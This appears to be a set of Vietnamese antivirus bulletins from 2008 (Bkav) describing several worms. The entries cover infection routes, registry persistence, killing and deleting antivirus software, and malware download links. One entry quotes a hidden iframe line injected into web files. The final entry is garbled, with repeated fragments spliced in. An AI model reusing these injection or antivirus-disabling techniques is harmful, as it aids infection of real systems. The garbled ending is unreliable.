127.0.0.1 liveupdatesnet.com %SysDir%\%random_name%.exe được phát hiện là AgentProx, ghi key run: [HKLM\ \Windows\CurrentVersion\Run] với giá trị "Advanced DHTML Enable" = %SysDir%\%random_name%.exe Chuyên viên phân tích : Tô Đình Hiệp Bkav1672 (23/05/2008) cập nhật lần thứ 1: VetorDH, WycaliB Malware cập nhật mới nhất: Tên malware: W32.Wycali.Worm Thuộc họ: W32.Wycali.Worm Loại: Worm Xuất xứ: Trung Quốc Ngày phát hiện mẫu: 22/05/2008 Kích thước: 9Kb Mức độ phá hoại: Cao Nguy cơ: Làm giảm mức độ an ninh của hệ thống. Mất các file .GHO Làm hỏng một số file chương trình. Hiện tượng: Sửa registry. Không sử dụng được một vài chương trình antivirus. Cách thức lây nhiễm: Phát tán qua trang web. Tự động lây nhiễm vào USB. Lây qua các file thực thi. Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật: Tắt các process : avp.exe, kvsrvxp.exe, kissvc.exe Kiểm tra nếu có process : avp.exe thì đặt lại năm hệ thống thành 2004. Xóa tất cả các file .GHO Tìm và lây nhiễm tất cả các file exe ngoại trừ : qq.exe, QQDoctor.exe, QQDoctorMain.exe. Đổi tên session cuối thành ".WYCao" nên một số chương trình ứng dụng sẽ không chạy được. Download file config từ link : http://x.u[removed]-01.net/x.txt Đọc file config, nếu sau từ khóa InfeWeb: có đường link thì ghi link đó vào cuối tất cả các file có đuôi : .do, .htm, .html, .shtm, .shtml, .asp, .aspx, .php, .jsp, .cgi, .xml Download trojan OnlineGames từ các link : http://1.fo[removed]00.net/a1.exe http://1.fo[removed]d00.net/a36.exe Chuyên viên phân tích : Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày: W32.AmvoDH.Worm, W32.Bilano.Trojan, W32.CyberAle.Adware, W32.DownloadAB.Trojan, W32.KavoXLF.Worm, W32.OnGamesXAA.Trojan, W32.Piery.Trojan, W32.FloodBlack.Trojan, W32.RejoicerC.Worm, W32.SpybotV.Trojan, W32.FakeAlertXA.Trojan, W32.CeekatK.Rootkit, W32.ProxyA.Trojan, W32.VetorDH.PE Bkav1680 - Phát hành lần thứ 2 ngày 28/05/2008, cập nhật QuikMsg, AvpB, CinmusXF, KavoADS, NTRootB, PeserD, PeserE Malware cập nhật mới nhất: Tên malware: W32.PeserD.Worm Thuộc họ: W32.Peser.Worm Loại: Worm Xuất xứ: Nước ngoài Ngày phát hiện mẫu: 28/05/2008 Kích thước: 61Kb Mức độ phá hoại: Cao Nguy cơ: Làm giảm mức độ an ninh của hệ thống. Làm hỏng các file thực thi đã được pack. Hiện tượng: Sửa registry. Không chạy được một vài chương trình thực thi. Cách thức lây nhiễm: Phát tán qua trang web. Tự động lây nhiễm vào USB. Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật: Tạo service : "Windows WorkStation" để virus được kích hoạt mỗi khi Windows khởi động Tạo mutex : "PEINFECT" để chỉ 1 virus cùng loại chạy trên 1 máy. Copy bản thân thành file có tên "mscrss.exe" vào thư mục %SysDir% Copy bản thân kèm theo file Autorun.inf vào các ổ USB để lây nhiễm. Download file từ link : http://ieopen.yhg[removed]es.com/iedown/down/upbho.exe Chèn thêm vào các file : .cgi, .php, .jsp, .asp, .html, .htm dòng sau : <iframe src="http://pk.yhg[removed]es.com/index.htm" width="0" height="0"></iframe> Tìm và lây nhiễm code độc vào các file *.exe (ngoại trừ thư mục Windows và ProgramFiles), đồng thời ghi bản thân worm vào Resource của file tìm được, làm các file thực thi đã pack đều không chạy được. Chuyên viên phân tích : Nguyễn Công Cường Phát hành lần thứ 2 ngày 31/05/2008, cập nhật Indiane, MsiupA, KavoADX, CinmusEA, CPushD, FarfliBB, GamesOnDllA Malware cập nhật mới nhất: Tên malware: W32.Indiane.Worm Thuộc họ: W32.Indiane.Worm Loại: Worm Xuất xứ: Nước ngoài Ngày phát hiện mẫu: 31/05/2008 Kích thước: 327Kb Mức độ phá hoại: Cao Nguy cơ: Làm giảm mức độ an ninh của hệ thống. Hiện tượng: Sửa registry. Hiển thị 1 bức ảnh bông hồng khi vào ie Hiện 1 hộp thông báo chứa nội dung bài hát ấn độ khi đăng nhập vào windows. Không sử dụng được một vài chương trình và tiện ích của windows : notepad, regedit, msconfig, taskmgr, Mất các menu : Run, Search, Không hiện được các file ẩn, file hệ thống. Cách thức lây nhiễm: Phát tán qua trang web. Tự động lây nhiễm vào USB. Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật: Ghi giá trị “WinUp”, "RsWin" Vào key HKCU\Software\Microsoft\Windows\CurrentVersion\Run Sửa các key : "Shell", "Userinit" để virus được kích hoạt mỗi khi Windows khởi động Xóa key không cho người dùng hiện các file ẩn và file hệ thống. Ghi key debugger để chạy file virus thay vì chạy các file : Regedit.exe, Msconfig.exe, taskmgr.exe, ntvdm.exe, rstrui.exe Ghi key hiện hộp thoại chứa bài hát "Kata Mutiara" mỗi khi đăng nhập vào windows. Copy bản thân thành các file vào thư mục hệ thống, ghi đè lên file Winrar.exe. Copy bản thân kèm theo file Autorun.inf vào tất cả các ổ đĩa. Tìm các thư mục ở ổ đĩa gốc, tạo file exe trùng tên thư mục rồi ẩn chính thư mục đó. Tắt các process : cmd.exe, command.com, command.exe, ntvdm.exe, msconfig.exe, procexp.exe, HijackThis.exe rstrui.exe, notepad.exe, regedit.exe, taskmgr.exe, killbox.exe, SysMech6.exe, IoloSGCtrl.exe, SystemGuardAlerter.exe Xóa tất cả các file trong thư mục : progra~1\antivi~1\*.* progra~1\ESET\*.* pccill~1\*.* iolo\*.* norton~1\*.* norton~2\*.* msav\*.* norman\*.* pav\*.* mcafee.com\VSO\*.* mcafee~1\*.* mcafee.com\agent\*.* mcafee.com\*.* kasper~2\*.* mcafee\*.* antivi~1\*.* antivi~2\*.* antiviru\*.* avg\*.* kasper~1\*.* progra~1\antivi~2\*.* progra~1\avg\*.* progra~1\kasper~1\*.* progra~1\kasper~2\*.* progra~1\mcafee\*.* progra~1\McAfee.com\agent\*.* progra~1\McAfee.com\\*.* progra~1\McAfee.com\VSO\*.* progra~1\mcafee~1\*.* progra~1\mindso~1\*.* progra~1\norman\*.* progra~1\norton~1\*.* progra~1\norton~2\*.* progra~1\pandas~1\*.* Progra~1\Alwils~1\*.* progra~1\iolo\*.* pc-cil~1\*.* progra~1\mcafee.com\agent\*.* progra~1\mcafee.com\*.* progra~1\mcafee.com\VSO\*.* Chuyên viên phân tích : Nguyễn Công Cường Bkav 1705 - Phát hành lần thứ 1 ngày 11/06/2008, cập nhật XorerR, Brute, AmvoYE, MmvoXA, DashfarC, DashferAE, FialaM, HacktoolO Malware cập nhật mới nhất: Tên malware: W32.FialaM.Worm Thuộc họ: W32.Fiala.Worm Loại: Worm Xuất xứ: Trung Quốc Ngày phát hiện mẫu: 10/06/2008 Kích thước: 27Kb Mức độ phá hoại: Cao Nguy cơ: Làm giảm mức độ an ninh của hệ thống. Bị ăn cắp mật khẩu tài khoản Game Online. Bị Hacker chiếm quyền điều khiển từ xa. Hiện tượng: Sửa registry. Không sử dụng được một số chương trình Antivirus, một vài tiện ích của Windows và một vài chương trình khác. . Tạo service : "Windows WorkStation" để virus được kích hoạt mỗi khi Windows khởi động Tạo mutex : "PEINFECT" để chỉ 1 virus cùng loại chạy trên 1 máy. Copy bản thân thành. "Userinit" để virus được kích hoạt mỗi khi Windows khởi động Xóa key không cho người dùng hiện các file ẩn và file hệ thống. Ghi key debugger để chạy file virus thay vì chạy các file. số file chương trình. Hiện tượng: Sửa registry. Không sử dụng được một vài chương trình antivirus. Cách thức lây nhiễm: Phát tán qua trang web. Tự động lây nhiễm vào USB. Lây qua các file